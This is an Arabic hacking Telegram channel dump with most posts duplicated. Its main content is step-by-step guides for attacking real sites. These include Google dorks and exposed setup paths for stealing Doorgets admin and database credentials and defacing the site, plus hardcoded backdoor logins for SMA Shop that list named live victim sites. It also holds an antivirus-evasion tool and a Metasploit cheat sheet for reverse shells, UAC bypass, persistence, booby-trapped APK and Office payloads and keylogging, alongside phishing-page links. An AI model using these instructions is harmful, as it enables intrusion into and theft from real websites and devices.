ثغرة بسيطة وسهلة للتجريب
الثغرة في سكريبت Doorgets
هذا المبرمج قام بتصميم السكريبت بطريقة يخزن فيها أسماء المستخدمين وكلمات السر كلها ضمن ملف بين ملفات الموقع (لا أعلم بم كان يفكر) وبهذه الطريقة يمكن الوصول إلى ملف كلمات السر من المتصفح
http://site.com/setup/temp/admin.php
(ملف كلمات سر لوحة التحكم)
http://site.com/setup/temp/database.php
(ملف كلمات سر قاعدة البيانات)
أظن السبب أنه لم يصممه بطريقة يمسح ملفات التثبيت بعد الانتهاء من تثبيت السكريبت على الموقع
أولاً : ابحث عن موقع مصاب في غوغل .. الدورك :
"Powered with doorGets ™" مع إشارات الاقتباس
ثانياً : اختر أحد المواقع .. انسخ عنوان الموقع
http://site.com
وأضف بعدها مسار ملف الإعدادات
http://site.com/setup/temp/admin.php
ستجد اسم المستخدم وكلمة السر
الآن عد إلى الصفحة الرئيسية للموقع للدخول إلى الحساب
http://site.com
اضغط على رمز 🙍♂️ أعلى ويمين الصفحة ثم اضغط sign in
أدخل اسم المستخدم وكلمة السر التي حصلت عليها ... ستجد نفسك داخل صفحة إدارة الموقع ... يمكنك إضافة مقالات أو إرسال رسائل لجميع المشتركين أو حتى يمكنك تغيير الإندكس (الindex هو الصفحة الرئيسية في كل مجلد بالموقع .. فعندما تدخل إلى الرابط
site.com
فإنك في الحقيقة تدخل إلى صفحة
site.com/index.php
قد يكون ملف الإندكس بامتداد php أو html , htm ........)
فعندما تغير ملف الإندكس الأساسي عندها سيظهر النص الذي تدخله لكل شخص يدخل إلى الموقع
قد تتمكن من رفع شيل لأنه يوجد عدة أماكن لرفع الملفات - جربها -
بالنسبة لأصحاب الخبرة الجيدة يمكنك الحصول على معلومات قاعدة البيانات من هنا
site.com/setup/temp/database.php
والتي تشمل عنوان الآي بي - اسم المستخدم - كلمة السر وإصدار قاعدة البيانات .. يمكنك الدخول إليها باستخدام برامج مثل hexorbase للكالي لينوكس
#Happy_Hacking 🙂
#NullByteStream_team
الثغرة في سكريبت Doorgets
هذا المبرمج قام بتصميم السكريبت بطريقة يخزن فيها أسماء المستخدمين وكلمات السر كلها ضمن ملف بين ملفات الموقع (لا أعلم بم كان يفكر) وبهذه الطريقة يمكن الوصول إلى ملف كلمات السر من المتصفح
http://site.com/setup/temp/admin.php
(ملف كلمات سر لوحة التحكم)
http://site.com/setup/temp/database.php
(ملف كلمات سر قاعدة البيانات)
أظن السبب أنه لم يصممه بطريقة يمسح ملفات التثبيت بعد الانتهاء من تثبيت السكريبت على الموقع
أولاً : ابحث عن موقع مصاب في غوغل .. الدورك :
"Powered with doorGets ™" مع إشارات الاقتباس
ثانياً : اختر أحد المواقع .. انسخ عنوان الموقع
http://site.com
وأضف بعدها مسار ملف الإعدادات
http://site.com/setup/temp/admin.php
ستجد اسم المستخدم وكلمة السر
الآن عد إلى الصفحة الرئيسية للموقع للدخول إلى الحساب
http://site.com
اضغط على رمز 🙍♂️ أعلى ويمين الصفحة ثم اضغط sign in
أدخل اسم المستخدم وكلمة السر التي حصلت عليها ... ستجد نفسك داخل صفحة إدارة الموقع ... يمكنك إضافة مقالات أو إرسال رسائل لجميع المشتركين أو حتى يمكنك تغيير الإندكس (الindex هو الصفحة الرئيسية في كل مجلد بالموقع .. فعندما تدخل إلى الرابط
site.com
فإنك في الحقيقة تدخل إلى صفحة
site.com/index.php
قد يكون ملف الإندكس بامتداد php أو html , htm ........)
فعندما تغير ملف الإندكس الأساسي عندها سيظهر النص الذي تدخله لكل شخص يدخل إلى الموقع
قد تتمكن من رفع شيل لأنه يوجد عدة أماكن لرفع الملفات - جربها -
بالنسبة لأصحاب الخبرة الجيدة يمكنك الحصول على معلومات قاعدة البيانات من هنا
site.com/setup/temp/database.php
والتي تشمل عنوان الآي بي - اسم المستخدم - كلمة السر وإصدار قاعدة البيانات .. يمكنك الدخول إليها باستخدام برامج مثل hexorbase للكالي لينوكس
#Happy_Hacking 🙂
#NullByteStream_team
#اختراق_الأجهزة
#الدرس_الثاني
- اختراق الأجهزة البعيدة عبر شبكة الانترنت باستخدام بايلودات الميتاسبلويت Metasploit
- أفضل بديل لأداة ngrok
رابط الشرح
http://nullbytestream.tk/articles.php?id=256860720925033088
#NullByteStream_team
#الدرس_الثاني
- اختراق الأجهزة البعيدة عبر شبكة الانترنت باستخدام بايلودات الميتاسبلويت Metasploit
- أفضل بديل لأداة ngrok
رابط الشرح
http://nullbytestream.tk/articles.php?id=256860720925033088
#NullByteStream_team
مجموعة مواقع مصابة للتجريب
هذا النوع من الثغرات يسمى backdoor account وهو عندما يقوم مصمم سكريبت الموقع بإضافة حساب إدارة مخفي ضمن كود السكريبت .. وهكذا يمكن الدخول إلى أي موقع يحوي هذا السكريبت عن طريق هذا الحساب
الدورك :
"© SMA Shop. All rights reserved."
أو
" product/minion-crazy "
بعد اختيار موقع والدخول إليه ندخل إلى لوحة التحكم
/admin
اسم المستخدم وكلمة السر :
[email protected]
12345678
أو
[email protected]
12345678
ستدخل إلى لوحة تحكم الموقع مباشرةً .. هذه المواقع هي مواقع تجارية shop
مواقع مصابة :
http://app.webagency.pk
لوحة التحكم :
http://app.webagency.pk/admin/
موقع ثاني :
http://sma.tecdiary.com
http://sma.tecdiary.com/admin
#NullByteStream_team
هذا النوع من الثغرات يسمى backdoor account وهو عندما يقوم مصمم سكريبت الموقع بإضافة حساب إدارة مخفي ضمن كود السكريبت .. وهكذا يمكن الدخول إلى أي موقع يحوي هذا السكريبت عن طريق هذا الحساب
الدورك :
"© SMA Shop. All rights reserved."
أو
" product/minion-crazy "
بعد اختيار موقع والدخول إليه ندخل إلى لوحة التحكم
/admin
اسم المستخدم وكلمة السر :
[email protected]
12345678
أو
[email protected]
12345678
ستدخل إلى لوحة تحكم الموقع مباشرةً .. هذه المواقع هي مواقع تجارية shop
مواقع مصابة :
http://app.webagency.pk
لوحة التحكم :
http://app.webagency.pk/admin/
موقع ثاني :
http://sma.tecdiary.com
http://sma.tecdiary.com/admin
#NullByteStream_team
expoilt
موقع يحوي مجموعة من أقوى الشلات للتحميل
لرفعها على المواقع والتحكم بها
رابط الموقع
http://www.expoilt.com/
#NullByteStream_team
موقع يحوي مجموعة من أقوى الشلات للتحميل
لرفعها على المواقع والتحكم بها
رابط الموقع
http://www.expoilt.com/
#NullByteStream_team
نسخة تلغرام الخاصة بنظام لينوكس
لا تحتاج إلى تثبيت
لا تحتاج إلى تثبيت
انسخ الملف التالي إلى جانب التطبيق ( للتحديثات ) 👇
Forwarded from Virtual]•[World]•[Kings منقول (ProMast3r 035)
يمكنك الان تثبيت الميتاسبلويت في termux
بكل سهولة عبر الامرين
#ProMast3r035
#VirtualWorldKings
بكل سهولة عبر الامرين
pkg install unstable-repo
pkg install metasploit
#ProMast3r035
#VirtualWorldKings
أنواع بروتوكولات TCP/IP
TCP/IP يتكون من مجموعة كبيرة من بروتوكولات الاتصالات المختلفة.
أنواع البروتوكولات
بداية يجب أن نوضح أن مجموعات بروتوكولات الاتصالات المختلفة تعتمد أساساً على بروتوكولين أصليين هما TCP و IP.
TCP - Transmission Control Protocol
يستخدم بروتوكول TCP لنقل البيانات من أحد التطبيقات إلى الشبكة. فبروتوكول TCP هو المسؤول عن تمرير البيانات إلى حزم الـ IP قبل إرسالها، وإعادة تجميع تلك الحزم عند استقبالها.
IP - Internet Protocol
بروتوكول الـ IP هو المسؤول عن الاتصالات مع أجهزة الحاسب الأخرى. فبروتوكول الـ IP يكون مسئولاً عن إرسال و استقبال حزم البيانات من وإلى شبكة الإنترنت.
HTTP - Hyper Text Transfer Protocol
بروتوكول HTTP هو المسؤول عن الاتصال بين خادم الويب (web server ) ومتصفح الويب ( web browser ) .
فبروتوكول HTTP يستخدم لإرسال طلب من جهازك (web client) عبر المتصفح إلى خادم الويب، وإعادة الطلب في شكل صفحات الويب من الخادم إلى متصفح العميل.
HTTPS - Secure HTTP
بروتوكول HTTPS هو المسؤول عن الاتصال الآمن بين خادم الويب ومتصفح الويب، فبروتوكول HTTPS يقوم على تنفيذ تعاملات البطاقات الائتمان والبيانات الحساسة الأخرى.
SSL - Secure Sockets Layer
يستخدم بروتوكول SSL لتشفير البيانات لنقل البيانات المؤمنة.
SMTP - Simple Mail Transfer Protocol
يستخدم بروتوكول SMTP لإرسال البريد الإلكتروني.
IMAP - Internet Message Access Protocol
يستخدم بروتوكول IMAP لتخزين واسترجاع البريد الإلكتروني.
POP - Post Office Protocol
يستخدم بروتوكول POP لتنزيل البريد الإلكتروني من خادم البريد الإلكتروني إلى حاسبك الشخصي.
FTP - File Transfer Protocol
بروتوكول FTP هو المسؤول عن نقل الملفات بين أجهزة الحاسب الآلي.
NTP - Network Time Protocol
يستخدم بروتوكول NTP لمزامنة الوقت (الساعة) بين أجهزة الحاسب الآلي.
DHCP - Dynamic Host Configuration Protocol
يستخدم بروتوكول DHCP لتخصيص عناوين IP لأجهزة الحاسب الآلي في شبكة الاتصال.
SNMP - Simple Network Management Protocol
يستخدم بروتوكول SNMP لإدارة شبكات الحاسب الآلي.
LDAP - Lightweight Directory Access Protocol
يستخدم بروتوكول LDAP لجمع المعلومات حول المستخدمين و عناوين البريد الإلكتروني من الإنترنت.
ICMP - Internet Control Message Protocol
بروتوكول ICMP يقوم على معالجة الأخطاء في الشبكة.
ARP - Address Resolution Protocol
يستخدم بروتوكول ARP بواسطة الـ IP لإيجاد عناوين ( معرفات ) الأجهزة من خلال بطاقة شبكة الحاسب اعتماداً على عناوين الـ IP.
RARP - Reverse Address Resolution Protocol
يستخدم بروتوكول RARP بواسطة الـ IP لإيجاد عناوين الـ IP اعتماداً على عناوين الأجهزة من خلال بطاقة شبكة الحاسب.
BOOTP - Boot Protocol
يستخدم بروتوكول BOOTP لبدء تشغيل الحاسب الآلي من الشبكة.
PPTP - Point to Point Tunneling Protocol
يستخدم برتوكول PPTP لإعداد قناة اتصال بين الشبكات الخاصة.
#منقول
Eng.Ahmad Al- Mashaikh
TCP/IP يتكون من مجموعة كبيرة من بروتوكولات الاتصالات المختلفة.
أنواع البروتوكولات
بداية يجب أن نوضح أن مجموعات بروتوكولات الاتصالات المختلفة تعتمد أساساً على بروتوكولين أصليين هما TCP و IP.
TCP - Transmission Control Protocol
يستخدم بروتوكول TCP لنقل البيانات من أحد التطبيقات إلى الشبكة. فبروتوكول TCP هو المسؤول عن تمرير البيانات إلى حزم الـ IP قبل إرسالها، وإعادة تجميع تلك الحزم عند استقبالها.
IP - Internet Protocol
بروتوكول الـ IP هو المسؤول عن الاتصالات مع أجهزة الحاسب الأخرى. فبروتوكول الـ IP يكون مسئولاً عن إرسال و استقبال حزم البيانات من وإلى شبكة الإنترنت.
HTTP - Hyper Text Transfer Protocol
بروتوكول HTTP هو المسؤول عن الاتصال بين خادم الويب (web server ) ومتصفح الويب ( web browser ) .
فبروتوكول HTTP يستخدم لإرسال طلب من جهازك (web client) عبر المتصفح إلى خادم الويب، وإعادة الطلب في شكل صفحات الويب من الخادم إلى متصفح العميل.
HTTPS - Secure HTTP
بروتوكول HTTPS هو المسؤول عن الاتصال الآمن بين خادم الويب ومتصفح الويب، فبروتوكول HTTPS يقوم على تنفيذ تعاملات البطاقات الائتمان والبيانات الحساسة الأخرى.
SSL - Secure Sockets Layer
يستخدم بروتوكول SSL لتشفير البيانات لنقل البيانات المؤمنة.
SMTP - Simple Mail Transfer Protocol
يستخدم بروتوكول SMTP لإرسال البريد الإلكتروني.
IMAP - Internet Message Access Protocol
يستخدم بروتوكول IMAP لتخزين واسترجاع البريد الإلكتروني.
POP - Post Office Protocol
يستخدم بروتوكول POP لتنزيل البريد الإلكتروني من خادم البريد الإلكتروني إلى حاسبك الشخصي.
FTP - File Transfer Protocol
بروتوكول FTP هو المسؤول عن نقل الملفات بين أجهزة الحاسب الآلي.
NTP - Network Time Protocol
يستخدم بروتوكول NTP لمزامنة الوقت (الساعة) بين أجهزة الحاسب الآلي.
DHCP - Dynamic Host Configuration Protocol
يستخدم بروتوكول DHCP لتخصيص عناوين IP لأجهزة الحاسب الآلي في شبكة الاتصال.
SNMP - Simple Network Management Protocol
يستخدم بروتوكول SNMP لإدارة شبكات الحاسب الآلي.
LDAP - Lightweight Directory Access Protocol
يستخدم بروتوكول LDAP لجمع المعلومات حول المستخدمين و عناوين البريد الإلكتروني من الإنترنت.
ICMP - Internet Control Message Protocol
بروتوكول ICMP يقوم على معالجة الأخطاء في الشبكة.
ARP - Address Resolution Protocol
يستخدم بروتوكول ARP بواسطة الـ IP لإيجاد عناوين ( معرفات ) الأجهزة من خلال بطاقة شبكة الحاسب اعتماداً على عناوين الـ IP.
RARP - Reverse Address Resolution Protocol
يستخدم بروتوكول RARP بواسطة الـ IP لإيجاد عناوين الـ IP اعتماداً على عناوين الأجهزة من خلال بطاقة شبكة الحاسب.
BOOTP - Boot Protocol
يستخدم بروتوكول BOOTP لبدء تشغيل الحاسب الآلي من الشبكة.
PPTP - Point to Point Tunneling Protocol
يستخدم برتوكول PPTP لإعداد قناة اتصال بين الشبكات الخاصة.
#منقول
Eng.Ahmad Al- Mashaikh
اداة لتخطي مكافحات الفيروسات
الاداة قادرة على إنشاء FUD(او بالمعنى العربي كلين)
قابل للتنفيذ حتى مع اشهر بايلودات الميتاسبلويت
$ get clone https://github.com/oddcod3/Phantom-Evasion
$ sudo chmod +x phantom-evasion.py
$ sudo ./phantom-evasion.py
#PlusX4
الاداة قادرة على إنشاء FUD(او بالمعنى العربي كلين)
قابل للتنفيذ حتى مع اشهر بايلودات الميتاسبلويت
$ get clone https://github.com/oddcod3/Phantom-Evasion
$ sudo chmod +x phantom-evasion.py
$ sudo ./phantom-evasion.py
#PlusX4
GitHub
GitHub - oddcod3/Phantom-Evasion: Python antivirus evasion tool
Python antivirus evasion tool . Contribute to oddcod3/Phantom-Evasion development by creating an account on GitHub.
استغلال بعض ثغرات MetaSploit 💻
________________________________________________
أختراق Windows عن طريق Power Shell باستغلال ثغرة web_delivery
+) ماهو Power Shell ؟
هو عبارة عن أمر او مجموعة من الأوامر التنفيذية التي تكتب في cmd او ما يسمى موجه الأوامر " أمتداده يكون bat ويمكن تحويله إلى ملف بأمتداد exe "
+) أوامر الأستغلال ~>
$ msfstart
$ msfconsole
$ use exploit/multi/script/web_delivery
$ show targets
$ set target <Numper Target>
$ set payload windows/meterpreter/reverse_tcp
$ set LHOST <ip>
$ set LPORT <port>
$ show option
$ exploit
$ session -i
$ session -i <Numper Session>
________________________________________________
تخطي UAC باستغلال ثغرة ASK
+) ماهو UAC ؟
هو عبارة عن صلاحيات الأدمن داخل جهاز الضحية
+) أوامر الأستغلال ~>
$ use exploit/windows/local/ask
$ set LHOST <ip>
$ set LPORT <port>
$ set session <numper session target>
$ set TECHNIQUE < PSH / EXE >
$ exploit
$ getsystem
$ run post/windows/gather/win_prives
________________________________________________
استغلال ثغرة s4u لتثبيت الضحية و حقن البايلود في جميع يوزر الضحية
+) أوامر الأستغلال ~>
$ use exploit/windows/local/s4u_persistence
$ set session <numper session target>
$ set TRIGGER <even,lock,logon,schedule,unlock>
$ set LPORT <port>
$ exploit
________________________________________________
اختراق الأجهزة بإستخدام سكربت بلغة الباثيون
+) صنع السكربت الملغم ~>
$ msfvenom -f raw -p python/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> -o <name>.py
+) أوامر الأستغلال ~>
$ use exploit/multi/handler
$ set payload python/meterpreter/reverse_tcp
$ set LHOST <ip>
$ set LPORT <port>
$ exploit
_________________________________________________
اختراق الاندرويد عن طريق بايلود apk ملغم
+) صنع بايلود ملغم ~>
$ msfvenom -p android/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> -o <name>.apk
+) الأستغلال ~>
$ use exploit/multi/handler
$ set payload android/meterpreter/reverse_tcp
$ set LHOST <ip>
$ set LPORT <port>
$ exploit -x hide_app_icon
_________________________________________________
التنصت على لوحة مفاتيح الضحية
+) أوامر الأستغلال ~>
$ use post/windows/capture/keylog_recorder
$ set session <numper session target>
$ exploit
________________________________________________
نقل عملية الاختراق داخل proceess عند قتل البايلود
+) أوامر الأستغلال ~>
$ use payload/windows/meterprerter/reverse_tcp
$ show advanced
$ set prependmigrate true
$ set prependmigrateproc svchost.exe
$ set LHOST <ip>
$ set LPORT <port>
$ generate -t exe -f <path>
________________________________________________
تلغيم ملفات Microsoft Offic
+) أمر تلغيم ~>
$ mafvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> -f vba-exe
+) أوامر الأستغلال ~>
$ use exploit/multi/handler
$ set payload windows/meterpreter/reverse_tcp
$ set LHOST <ip>
$ set LPORT <port>
$ exploit
________________________________________________
#PlusX4
________________________________________________
أختراق Windows عن طريق Power Shell باستغلال ثغرة web_delivery
+) ماهو Power Shell ؟
هو عبارة عن أمر او مجموعة من الأوامر التنفيذية التي تكتب في cmd او ما يسمى موجه الأوامر " أمتداده يكون bat ويمكن تحويله إلى ملف بأمتداد exe "
+) أوامر الأستغلال ~>
$ msfstart
$ msfconsole
$ use exploit/multi/script/web_delivery
$ show targets
$ set target <Numper Target>
$ set payload windows/meterpreter/reverse_tcp
$ set LHOST <ip>
$ set LPORT <port>
$ show option
$ exploit
$ session -i
$ session -i <Numper Session>
________________________________________________
تخطي UAC باستغلال ثغرة ASK
+) ماهو UAC ؟
هو عبارة عن صلاحيات الأدمن داخل جهاز الضحية
+) أوامر الأستغلال ~>
$ use exploit/windows/local/ask
$ set LHOST <ip>
$ set LPORT <port>
$ set session <numper session target>
$ set TECHNIQUE < PSH / EXE >
$ exploit
$ getsystem
$ run post/windows/gather/win_prives
________________________________________________
استغلال ثغرة s4u لتثبيت الضحية و حقن البايلود في جميع يوزر الضحية
+) أوامر الأستغلال ~>
$ use exploit/windows/local/s4u_persistence
$ set session <numper session target>
$ set TRIGGER <even,lock,logon,schedule,unlock>
$ set LPORT <port>
$ exploit
________________________________________________
اختراق الأجهزة بإستخدام سكربت بلغة الباثيون
+) صنع السكربت الملغم ~>
$ msfvenom -f raw -p python/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> -o <name>.py
+) أوامر الأستغلال ~>
$ use exploit/multi/handler
$ set payload python/meterpreter/reverse_tcp
$ set LHOST <ip>
$ set LPORT <port>
$ exploit
_________________________________________________
اختراق الاندرويد عن طريق بايلود apk ملغم
+) صنع بايلود ملغم ~>
$ msfvenom -p android/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> -o <name>.apk
+) الأستغلال ~>
$ use exploit/multi/handler
$ set payload android/meterpreter/reverse_tcp
$ set LHOST <ip>
$ set LPORT <port>
$ exploit -x hide_app_icon
_________________________________________________
التنصت على لوحة مفاتيح الضحية
+) أوامر الأستغلال ~>
$ use post/windows/capture/keylog_recorder
$ set session <numper session target>
$ exploit
________________________________________________
نقل عملية الاختراق داخل proceess عند قتل البايلود
+) أوامر الأستغلال ~>
$ use payload/windows/meterprerter/reverse_tcp
$ show advanced
$ set prependmigrate true
$ set prependmigrateproc svchost.exe
$ set LHOST <ip>
$ set LPORT <port>
$ generate -t exe -f <path>
________________________________________________
تلغيم ملفات Microsoft Offic
+) أمر تلغيم ~>
$ mafvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> -f vba-exe
+) أوامر الأستغلال ~>
$ use exploit/multi/handler
$ set payload windows/meterpreter/reverse_tcp
$ set LHOST <ip>
$ set LPORT <port>
$ exploit
________________________________________________
#PlusX4
شرح اختراق الحسابات عن طريق الصفحات المزورة
الشرح مقدم من ملوك العالم الافتراضي VWK
@PM035
رابط الشرح
https://virtualworldkings.blogspot.com/2019/03/blog-post_12.html?m=1
الشرح مقدم من ملوك العالم الافتراضي VWK
@PM035
رابط الشرح
https://virtualworldkings.blogspot.com/2019/03/blog-post_12.html?m=1
Blogspot
دورة اختراق الحسابات الدرس الثاني من الصفحات المزورة
#اختراق_الحسابات #الصفحات_المزورة #الدرس_الثاني بسم الله الرحمن الرحيم اليوم نشرح الطريقة رقم 1 لانشاء صفحة مزورة وهي بتكون عبر مواقع ج...
حل مشكلة أداة نجروك على التيرموكس 2019
http://nullbytestream.tk/articles.php?id=614364368841052032
#PlusX4
http://nullbytestream.tk/articles.php?id=614364368841052032
#PlusX4
Forwarded from Project Sigma - Advanced PT (ÃŕMąŃđÒ)
تحويل Nmap إلى أداة لفحص الثغرات الأمنية في المواقع CVE scanner عبر سكربتين يمكن إضافتهما إليها vulscan,vulners
تقوم هذه الأدوات باستخدام نتائج فحص nmap للخدمات المثبتة لتوقع الثغرات المحتملة فيها .. بالاعتماد على عدة قواعد بيانات من عدة مواقع وخدمات مشهورة :
scipvuldb
cve
osvdb
securityfocus
securitytracker
xforce
expliotdb
openvas
رابط الشرح :
http://nullbytestream.tk/articles.php?id=510766563005745408
#ArMaNdO
#NullByteStream_team
تقوم هذه الأدوات باستخدام نتائج فحص nmap للخدمات المثبتة لتوقع الثغرات المحتملة فيها .. بالاعتماد على عدة قواعد بيانات من عدة مواقع وخدمات مشهورة :
scipvuldb
cve
osvdb
securityfocus
securitytracker
xforce
expliotdb
openvas
رابط الشرح :
http://nullbytestream.tk/articles.php?id=510766563005745408
#ArMaNdO
#NullByteStream_team
Forwarded from Project Sigma - Programming (ÃŕMąŃđÒ)
لديك بعض وقت الفراغ وترغب بالاستفادة منه لربح القليل من المال بإنجاز بعض الأعمال السريعة ؟ جرب خدمات الFreelancer
freelancer هي عبارة عن مواقع خاصة بتبادل المشاريع الصغيرة .. يستخدمها كل من يريد إنجاز مشروع ما فيقوم بنشر مشروعه ليجد الشخص المناسب لإنجازه
أو من يريد ربح المال من إنجاز هذه الأعمال
نوع العمل قد يكون أي شيء ( تصميم موقع ، إصلاح نوع من الأخطاء ، إضافة صفحة أو كود ما لموقع ، تصميم تطبيق أندرويد ، تصميم صور أو فيديو أو ترجمة نصوص أو أي شيء ... ) يمكنك الدخول وتسجيل حساب وإضافة خبراتك إلى حسابك الشخصي مثل لغات البرمجة التي تعرفها لتظهر لك المشاريع المناسبة لك
يوجد العديد من المواقع التي تقدم هذه الخدمات ولكن من أشهرها وأفضلها موقع freelancer والمتوافر كتطبيق للأندرويد سهل الاستخدام
يمكنك تحميل التطبيق من رابط الدعوة التالي لتحصل على 20$ عند انضمامك لأول مشروع :
https://www.freelancer.com/get/syriaarmando
#ArMaNdO
#NullByteStream_team
freelancer هي عبارة عن مواقع خاصة بتبادل المشاريع الصغيرة .. يستخدمها كل من يريد إنجاز مشروع ما فيقوم بنشر مشروعه ليجد الشخص المناسب لإنجازه
أو من يريد ربح المال من إنجاز هذه الأعمال
نوع العمل قد يكون أي شيء ( تصميم موقع ، إصلاح نوع من الأخطاء ، إضافة صفحة أو كود ما لموقع ، تصميم تطبيق أندرويد ، تصميم صور أو فيديو أو ترجمة نصوص أو أي شيء ... ) يمكنك الدخول وتسجيل حساب وإضافة خبراتك إلى حسابك الشخصي مثل لغات البرمجة التي تعرفها لتظهر لك المشاريع المناسبة لك
يوجد العديد من المواقع التي تقدم هذه الخدمات ولكن من أشهرها وأفضلها موقع freelancer والمتوافر كتطبيق للأندرويد سهل الاستخدام
يمكنك تحميل التطبيق من رابط الدعوة التالي لتحصل على 20$ عند انضمامك لأول مشروع :
https://www.freelancer.com/get/syriaarmando
#ArMaNdO
#NullByteStream_team
Project Sigma - Programming
لديك بعض وقت الفراغ وترغب بالاستفادة منه لربح القليل من المال بإنجاز بعض الأعمال السريعة ؟ جرب خدمات الFreelancer freelancer هي عبارة عن مواقع خاصة بتبادل المشاريع الصغيرة .. يستخدمها كل من يريد إنجاز مشروع ما فيقوم بنشر مشروعه ليجد الشخص المناسب لإنجازه أو…
بعد الدخول إلى الرابط اضغط
I want to work
وأدخل معلومات حسابك للتسجيل
I want to work
وأدخل معلومات حسابك للتسجيل
#NullByteStream_Penetesters
سنجري ابتداءً من الآن مجموعة تحديات على قناة penetesters
هذه التحديات هي عبارة عن سؤال كل أسبوع أو اثنين في مختلف مجالات التقنية
أول عدد محدد من المشاركين يقوم بالإجابة عليه سيحصل على عدد من النقاط حسب السؤال
وسيتم حفظ نقاط كل مشترك وترتيبهم حسب الأعلى وستظهر النتائج دائماً بالطبع على القناة والموقع .. حيث سنضع التصنيف حسب عدد النقاط الإجمالي بالإضافة إلى تصنيف آخر حسب أعلى نقاط وأعلى مشاركة كل شهر أو شهرين مثلاً
المشاركة مفتوحة للجميع كل ما عليك هو إرسال الإجابة إلى البوت
مستوى الأسئلة سيختلف بين سؤال وآخر . والتصنيف كالتالي بحسب الرقم :
(1) سهل - مقابل نقطة واحدة
(2) مقابل نقطتين
(3) متوسط - 3 نقاط
(4) مقابل 4 نقاط
(5) صعب - 5 نقاط
نوع الأسئلة قد تكون من ضمن ما شرحناه على القناة أو أي شيء
بدء المسابقة يعتمد على نتائج التصويت
سنجري ابتداءً من الآن مجموعة تحديات على قناة penetesters
هذه التحديات هي عبارة عن سؤال كل أسبوع أو اثنين في مختلف مجالات التقنية
أول عدد محدد من المشاركين يقوم بالإجابة عليه سيحصل على عدد من النقاط حسب السؤال
وسيتم حفظ نقاط كل مشترك وترتيبهم حسب الأعلى وستظهر النتائج دائماً بالطبع على القناة والموقع .. حيث سنضع التصنيف حسب عدد النقاط الإجمالي بالإضافة إلى تصنيف آخر حسب أعلى نقاط وأعلى مشاركة كل شهر أو شهرين مثلاً
المشاركة مفتوحة للجميع كل ما عليك هو إرسال الإجابة إلى البوت
مستوى الأسئلة سيختلف بين سؤال وآخر . والتصنيف كالتالي بحسب الرقم :
(1) سهل - مقابل نقطة واحدة
(2) مقابل نقطتين
(3) متوسط - 3 نقاط
(4) مقابل 4 نقاط
(5) صعب - 5 نقاط
نوع الأسئلة قد تكون من ضمن ما شرحناه على القناة أو أي شيء
بدء المسابقة يعتمد على نتائج التصويت
Forwarded from Project Sigma (ÃŕMąŃđÒ)
Quick Script Encryption Tool - V1.0
تم إطلاق النسخة الخاصة بلغة الBash
تشفير السكربتات المكتوبة بلغة الباش
رابط التحميل :
http://NullByteStream.tk/files/Quick_Script_Encryption_Tool_V1.0_-_Bash.py
#ملاحظة : الأداة مكتوبة بلغة البايثون ، لفتحها :
#NullByteStream_team
تم إطلاق النسخة الخاصة بلغة الBash
تشفير السكربتات المكتوبة بلغة الباش
رابط التحميل :
http://NullByteStream.tk/files/Quick_Script_Encryption_Tool_V1.0_-_Bash.py
#ملاحظة : الأداة مكتوبة بلغة البايثون ، لفتحها :
python2 Quick_Script_Encryption_Tool_V1.0_-_Bash.py
#NullByteStream_team